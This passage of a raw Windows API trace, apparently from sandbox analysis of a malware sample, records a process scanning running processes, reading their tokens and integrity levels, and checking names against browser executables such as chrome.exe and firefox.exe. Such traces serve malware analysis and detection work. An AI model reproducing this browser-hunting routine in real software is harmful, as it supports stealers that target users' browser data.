[3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0466.203] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0466.203] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3780e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">R") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0466.203] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0466.203] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0466.203] GetLastError () returned 0x7a [0466.204] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0466.204] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0466.204] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0466.204] CloseHandle (hObject=0x3bc) returned 1 [0466.204] CloseHandle (hObject=0x5a4) returned 1 [0466.205] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0466.205] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0466.205] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0466.205] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0466.205] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0466.205] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0466.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0466.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0466.205] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0466.205] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0466.206] GetLastError () returned 0x7a [0466.206] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0466.206] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0466.206] CloseHandle (hObject=0x3bc) returned 1 [0466.206] CloseHandle (hObject=0x5a4) returned 1 [0466.206] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0466.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0466.206] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375d60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">S") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0466.206] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0466.207] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0466.207] GetLastError () returned 0x7a [0466.207] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0466.207] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0466.207] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0466.207] CloseHandle (hObject=0x3bc) returned 1 [0466.207] CloseHandle (hObject=0x5a4) returned 1 [0466.208] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0466.208] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0466.208] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0466.208] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0466.208] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0466.208] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0466.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0466.208] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0466.209] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0466.209] GetLastError () returned 0x7a [0466.209] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0466.209] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0466.209] CloseHandle (hObject=0x3bc) returned 1 [0466.209] CloseHandle (hObject=0x5a4) returned 1 [0466.209] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0466.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0466.210] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376520, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">T") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0466.210] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0466.210] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0466.210] GetLastError () returned 0x7a [0466.210] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0466.210] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0466.210] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0466.210] CloseHandle (hObject=0x3bc) returned 1 [0466.210] CloseHandle (hObject=0x5a4) returned 1 [0466.211] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0466.211] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0466.211] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0466.211] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0466.211] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0466.211] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0466.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0466.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0466.212] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0466.212] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0466.212] GetLastError () returned 0x7a [0466.212] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0466.212] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0466.212] CloseHandle (hObject=0x3bc) returned 1 [0466.212] CloseHandle (hObject=0x5a4) returned 1 [0466.212] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0466.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0466.213] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376b68, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">U") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0466.213] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0466.213] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0466.213] GetLastError () returned 0x7a [0466.214] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0466.214] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0466.214] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0466.214] CloseHandle (hObject=0x3bc) returned 1 [0466.214] CloseHandle (hObject=0x5a4) returned 1 [0466.215] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0466.215] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0466.215] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0466.215] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0466.215] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0466.215] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0466.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0466.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0466.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0466.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0466.216] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0466.216] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0466.216] GetLastError () returned 0x7a [0466.216] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0466.216] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0466.216] CloseHandle (hObject=0x3bc) returned 1 [0466.216] CloseHandle (hObject=0x5a4) returned 1 [0466.216] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0466.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0466.217] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376f10, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">V") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0466.217] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0466.217] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0466.217] GetLastError () returned 0x7a [0466.217] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0466.217] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0466.217] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0466.217] CloseHandle (hObject=0x3bc) returned 1 [0466.217] CloseHandle (hObject=0x5a4) returned 1 [0466.218] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0466.218] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0466.218] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0466.218] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0466.218] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0466.218] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0466.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0466.219] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0466.220] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0468.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa798) returned 0xc0000004 [0468.226] VirtualAlloc (lpAddress=0x0, dwSize=0xb798, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0468.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb798, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0468.227] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0468.227] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0468.227] GetLastError () returned 0x7a [0468.227] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0468.227] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0468.227] CloseHandle (hObject=0x3bc) returned 1 [0468.227] CloseHandle (hObject=0x5a4) returned 1 [0468.227] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0468.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0468.228] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x3780e8, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">W") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0468.228] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0468.228] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0468.228] GetLastError () returned 0x7a [0468.228] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0468.228] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0468.228] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0468.228] CloseHandle (hObject=0x3bc) returned 1 [0468.228] CloseHandle (hObject=0x5a4) returned 1 [0468.228] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0468.228] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0468.228] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0468.228] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0468.228] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0468.228] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0468.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0468.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0468.228] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0468.228] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0468.228] GetLastError () returned 0x7a [0468.228] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0468.228] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0468.228] CloseHandle (hObject=0x3bc) returned 1 [0468.228] CloseHandle (hObject=0x5a4) returned 1 [0468.228] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0468.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0468.228] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x375d60, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">X") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0468.228] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0468.228] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0468.228] GetLastError () returned 0x7a [0468.228] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0468.228] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0468.228] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0468.229] CloseHandle (hObject=0x3bc) returned 1 [0468.229] CloseHandle (hObject=0x5a4) returned 1 [0468.229] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0468.229] lstrcmpiW 